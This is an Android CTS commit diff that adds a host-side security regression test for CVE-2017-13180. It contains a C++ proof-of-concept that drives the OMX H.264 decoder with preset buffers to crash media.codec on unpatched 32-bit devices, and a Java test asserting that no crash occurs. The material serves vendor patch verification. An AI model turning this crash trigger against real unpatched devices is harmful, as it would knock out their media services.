[RESTRICT AUTOMERGE] CTS test for Android Security b/66969349

Bug: 66969349
Bug: 72401027
Test: Ran the new testcase on android-10.0.0_r2 to test with/without patch

Change-Id: Ib19d8df21819e8f09d7472554901cd3d8f8a6e05
Merged-In: Ib19d8df21819e8f09d7472554901cd3d8f8a6e05
(cherry picked from commit a2fc442100b5e3dd28bce32ce96a0ae244867b5b)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index d767d42..3dd77ff 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -168,6 +168,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-01 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-13180->/data/local/tmp/CVE-2017-13180" />
         <option name="push" value="CVE-2017-0817->/data/local/tmp/CVE-2017-0817" />
         <option name="push" value="CVE-2018-9527->/data/local/tmp/CVE-2018-9527" />
 
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
new file mode 100644
index 0000000..2139583
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2017-13180",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+    ],
+    multilib: {
+        lib32: {
+            srcs: [
+                ":cts_hostsidetests_securitybulletin_omxutils",
+            ],
+            shared_libs: [
+                "libstagefright",
+                "libbinder",
+                "libmedia_omx",
+                "libutils",
+                "liblog",
+                "libstagefright_foundation",
+                "libcutils",
+                "libhidlbase",
+                "libhidlmemory",
+                "android.hidl.allocator@1.0",
+                "android.hardware.media.omx@1.0",
+            ],
+            suffix: "32",
+        },
+        lib64: {
+            suffix: "64",
+        },
+    },
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp
new file mode 100644
index 0000000..33ffdaf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/poc.cpp
@@ -0,0 +1,111 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License"); you may not
+ * use this file except in compliance with the License. You may obtain a copy of
+ * the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+ * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+ * License for the specific language governing permissions and limitations under
+ * the License.
+ */
+
+#include "../includes/common.h"
+#include <stdlib.h>
+
+// This PoC is only for 32-bit builds
+#if _32_BIT
+#include "../includes/omxUtils.h"
+#define TIMESTAMP_US 0x00010001
+
+extern bool mUseTreble;
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers) {
+  buffers->clear();
+  OMX_PARAM_PORTDEFINITIONTYPE def;
+  int err = omxUtilsGetParameter(portIndex, &def);
+  omxExitOnError(err);
+
+  for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+    Buffer buffer;
+    buffer.mFlags = 0;
+    bool success;
+    auto transStatus = mAllocator->allocate(
+        def.nBufferSize, [&success, &buffer](bool s, hidl_memory const &m) {
+          success = s;
+          buffer.mHidlMemory = m;
+        });
+    omxExitOnError(!transStatus.isOk());
+    omxExitOnError(!success);
+    omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+    buffers->push(buffer);
+  }
+  return OK;
+}
+#endif /* _32_BIT */
+
+int main() {
+
+// This PoC is only for 32-bit builds
+#if _32_BIT
+  int i;
+  Vector<Buffer> inputBuffers;
+  Vector<Buffer> outputBuffers;
+  status_t err = omxUtilsInit((char *)"OMX.google.h264.decoder");
+
+  omxExitOnError(err);
+
+  OMX_PARAM_PORTDEFINITIONTYPE def;
+  omxUtilsGetParameter(OMX_UTILS_IP_PORT, &def);
+
+  int inMemorySize = def.nBufferCountActual * def.nBufferSize;
+  int inBufferCount = def.nBufferCountActual;
+  sp<MemoryDealer> dealerIn = new MemoryDealer(inMemorySize);
+  IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCount];
+
+  omxUtilsGetParameter(OMX_UTILS_OP_PORT, &def);
+
+  int outMemorySize = def.nBufferCountActual * def.nBufferSize;
+  int outBufferCnt = def.nBufferCountActual;
+  sp<MemoryDealer> dealerOut = new MemoryDealer(outMemorySize);
+  IOMX::buffer_id *outBufferId = new IOMX::buffer_id[outBufferCnt];
+
+  allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+  for (i = 0; i < inBufferCount; ++i) {
+    inBufferId[i] = inputBuffers[i].mID;
+  }
+
+  allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+  for (i = 0; i < outBufferCnt; ++i) {
+    outBufferId[i] = outputBuffers[i].mID;
+  }
+
+  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+
+  OMX_U32 flags = OMX_BUFFERFLAG_ENDOFFRAME;
+  int64_t timeUs = TIMESTAMP_US;
+  omxUtilsEmptyBuffer(inBufferId[0], OMXBuffer::sPreset, flags, timeUs, -1);
+  omxUtilsFillBuffer(outBufferId[0], OMXBuffer::sPreset, -1);
+
+  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+
+  for (i = 0; i < inBufferCount; ++i) {
+    omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID);
+  }
+
+  for (i = 0; i < outBufferCnt; ++i) {
+    omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID);
+  }
+
+  omxUtilsFreeNode();
+#endif /* _32_BIT */
+
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 378586f..57dae7e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -45,6 +45,18 @@
      ******************************************************************************/
 
     /**
+     * b/66969349
+     * Vulnerability Behaviour: SIGSEGV in media.codec
+     */
+    @SecurityTest(minPatchLevel = "2018-01")
+    @Test
+    public void testPocCVE_2017_13180() throws Exception {
+        String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13180", null, getDevice(),
+                processPatternStrings);
+    }
+
+    /**
      * b/111210196
      * Vulnerability Behaviour: EXIT_VULNERABLE (113)
      */